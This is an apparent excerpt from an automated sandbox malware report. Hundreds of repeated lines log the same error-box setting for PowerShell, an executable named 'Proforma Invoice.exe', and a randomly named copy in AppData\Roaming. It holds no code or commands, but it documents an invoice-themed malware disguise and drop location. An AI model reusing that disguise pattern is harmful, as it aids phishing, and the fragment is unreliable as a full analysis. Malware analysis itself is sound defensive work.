Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Process information set: NOOPENFILEERRORBOX
